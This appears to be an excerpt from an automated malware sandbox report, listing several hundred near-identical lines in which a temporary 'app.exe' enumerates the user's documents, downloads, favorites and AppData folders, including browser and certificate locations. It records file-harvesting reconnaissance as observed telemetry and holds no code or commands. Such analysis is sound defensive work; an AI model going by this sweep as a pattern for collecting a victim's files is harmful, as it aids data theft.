Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\IVHSHTCODI VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\JDSOXXXWOA VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\PSAMNLJHZW VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\Word.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\AFWAAFRXKO VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\GQSZOBXUFX VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\IVHSHTCODI VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\JDSOXXXWOA VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\MLMJAYLPER VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\MLMJAYLPER\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Music VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Music\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Pictures\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Videos VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Videos\Captures VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Videos\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\PSAMNLJHZW VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Downloads VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Downloads\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Downloads\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\IVHSHTCODI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\IVHSHTCODI.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\JPEAFKFPZY.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\XQACHMZIHU.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.jpg VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Amazon.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Bing.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Bing.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Facebook.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Google.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Links VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Links\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Links\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Live.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\NYTimes.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Reddit.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Reddit.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Wikipedia.url VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Brighten Video.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Brighten Video.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\BRIGHT~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\BRIGHT~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Darken Video.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Darken Video.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\DARKEN~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\DARKEN~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Enhance Video Colors.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\Enhance Video Colors.man.igpi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\ENHANC~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\IntelGraphicsProfiles\ENHANC~1.IGP VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\Desktop.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\Desktop.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Links\Downloads.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe\Acrobat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe\ARM VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe\Color VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PeerDistRepub VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Publishers VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\_curlrc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms\Unistore VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresource VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresource VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache\3534848bb9f4cb71 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache\cb00da9ba77862e VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google\CrashReports VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google\Software Reporter Tool VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History\Low VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Intel\CUIPromotions VolumeInformationJump to behavior
